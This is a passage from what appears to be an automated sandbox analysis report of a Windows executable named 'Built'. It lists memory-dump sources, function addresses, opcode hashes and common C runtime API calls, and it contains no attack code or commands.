                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 840049012-0
                                                                                                                                                                                                                                                        • Opcode ID: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
                                                                                                                                                                                                                                                        • Instruction ID: 14158abfd7d765aff35c4f521640649d5e5df173ef2cddfc1e3cef4ca73ece10
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 13219612B1C75646FE549A226B047BAB651BF65BC4FCC5470FE0DABB8ACEBDE041C200
                                                                                                                                                                                                                                                        Function 00007FF65E29B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                        • Instruction ID: 6b76e0ff4361bd17b88ad132046d82c8f01f0885ab35220bc16dd0e69b1d6e46
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F31A122A2860281FF116B559B8037C3691BFA1B91F492135F95DE73DACF7CE8C18B15
                                                                                                                                                                                                                                                        Function 00007FF65E299961 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3947729631-0
                                                                                                                                                                                                                                                        • Opcode ID: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                                        • Instruction ID: b1ab686f66b137d2646cc1eb0d4413a742d85e32f4b728e9f470ca1af0800490
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42808d7c08696a35870eb95595f0ae95ff90971c005bfc8769c42bb91e99b0de
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39219F72A0474589FF248F68C6802EC33A4FB18728F081636F75CA6AC9DF38E584C740
                                                                                                                                                                                                                                                        Function 00007FF65E295F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                        • Instruction ID: a771bfc59f78610a09b1be8a1d5afca25e14996be5ee87d8ce3cf27fd38fb3e9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA114F21B1D64282EE609F119700179B264AFA5B94F486435FACCE7A9ECF3DE4804710
                                                                                                                                                                                                                                                        Function 00007FF65E2A6354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                        • Instruction ID: b9db4eebd6a38d23403daf4b428746a1ddf82df7295bbbad5324463d52b7d062
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85218072A18A4286DF618F18D74037976A0BBA4B54F289238F65DD76DDDF7DD4018B00
                                                                                                                                                                                                                                                        Function 00007FF65E2903BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                        • Instruction ID: 746715f2331bd27c1a40f8ff3ba34d05c2f53bd702c9384d50cfaf15f03364a2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E017061A0874540EE449F525B00469B6A1AFA5FE0F4C6631FE5CF3BDACF3CD8814300
                                                                                                                                                                                                                                                        Function 00007FF65E297EFC Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                                                        • Instruction ID: 8474b209d402daf86de806d1355744ca8ed5b99958f61ccd20f6fe72bffd4ad2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb4e03bbc0b04cbc85d5aa4284f536322b5632f0a5d263bd1b62b358e696f9c3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66015722E1D68740FE606A21A7411793290AF707A0F5C6635FA1CF26CEDE3CA4814201
                                                                                                                                                                                                                                                        Function 00007FF65E298238 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                        • Instruction ID: f311a9fce46dd841bf228b470f67d69d4be8978464bd9b97b2c61df964ea8f69
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3541b91b086c77dfe17527b78ee7977ece0d5fdea915d925a3ffaee66e22a6c2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4E08C50E1C64787FE193AA407C217832605FB5340F4C2035F908E62CBDD2C7CC45221
                                                                                                                                                                                                                                                        Function 00007FF65E29D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF65E290C90,?,?,?,00007FF65E2922FA,?,?,?,?,?,00007FF65E293AE9), ref: 00007FF65E29D63A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                        • Instruction ID: f5d1832e896caa1be7be3ae7a5d7a6eae82285e47200a61c388d9548037fd0e9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47F05894F0920340FE642BB16B4127833914FA87A0F0C2730FD2EE62CEDE6CB4C0A220

                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                        Function 00007FF65E28D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                                        • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                        • Instruction ID: c029b04f5d2fe372bf99dae1428ccea2a01d0a6b27139f789525ed6a9e8a71a1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87314F76608B8186EF608F60E9903EE7365FB94748F48403AEA4E97B99DF7CD548C710
                                                                                                                                                                                                                                                        Function 00007FF65E2A5C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5C45
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E2A5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E2A55AC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A948: RtlFreeHeap.NTDLL(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A95E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A948: GetLastError.KERNEL32(?,?,?,00007FF65E2A2D22,?,?,?,00007FF65E2A2D5F,?,?,00000000,00007FF65E2A3225,?,?,?,00007FF65E2A3157), ref: 00007FF65E29A968
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF65E29A8DF,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29A909
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E29A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF65E29A8DF,?,?,?,?,?,00007FF65E29A7CA), ref: 00007FF65E29A92E
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5C34
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E2A55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E2A560C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5EAA
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5EBB
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5ECC
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF65E2A610C), ref: 00007FF65E2A5EF3
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4070488512-0
                                                                                                                                                                                                                                                        • Opcode ID: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                                        • Instruction ID: 4f281034176911df3013f987ee8b4250cc6c8bb6dd160c89aabe629e5470f518
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8e181fbda5929fcc8f6a75e148055e791a7ddaa32984997676ab034941af52a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FD1A162A8864286EF24AF21DB411BA77A1FF64784F488039FA4DE769DDF7CE4418740
                                                                                                                                                                                                                                                        Function 00007FF65E29A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                                        • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                        • Instruction ID: bfb0a482f15c2cca432239415db995466ff1d2953f692fbc3e109f01d8b97bb7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A316F36A08B8186DF60CF25EA402AE77A5FB98754F580136FA9D93B58DF7CC145CB00
                                                                                                                                                                                                                                                        Function 00007FF65E2A1874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2219004996.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2218962761.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219064907.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219128775.00007FF65E2C2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2219199490.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                                                        • Opcode ID: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                                        • Instruction ID: cb339db5556bb6227c5282cbd2160c5834d84b55c4179c21492ceda88941e2a8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee5daded1920a45b930385d49f4c9fb7106de6f00b6358014c2482279c1420ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59B194A2B5879241EE619B2297001B97391FB64BF4F885131FA5EA7BDDEE7CE441C300
                                                                                                                                                                                                                                                        Function 00007FF65E2A5E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5EAA
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E2A55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E2A560C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF65E2A5EBB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E2A5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF65E2A55AC
